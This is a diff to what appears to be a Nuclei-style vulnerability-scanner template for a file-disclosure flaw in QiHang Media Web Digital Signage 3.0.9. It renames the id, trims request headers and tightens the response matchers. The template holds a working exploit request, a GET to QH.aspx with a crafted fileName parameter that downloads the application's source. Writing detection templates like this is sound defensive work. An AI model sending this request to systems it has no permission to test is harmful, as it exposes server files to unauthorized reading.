--- a/vulnerabilities/other/qihang-media-lfi.yaml
+++ b/vulnerabilities/other/qihang-media-lfi.yaml
@@ -1,4 +1,4 @@
-id: qihang-media-web-lfi
+id: qihang-media-lfi
 
 info:
   name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
@@ -13,16 +13,13 @@ requests:
       - |
         GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
         Host: {{Hostname}}
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en-US,en;q=0.9
         Connection: close
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "attachment"
+          - "filename=QH.aspx"
           - "application/zip"
         part: header
         condition: and
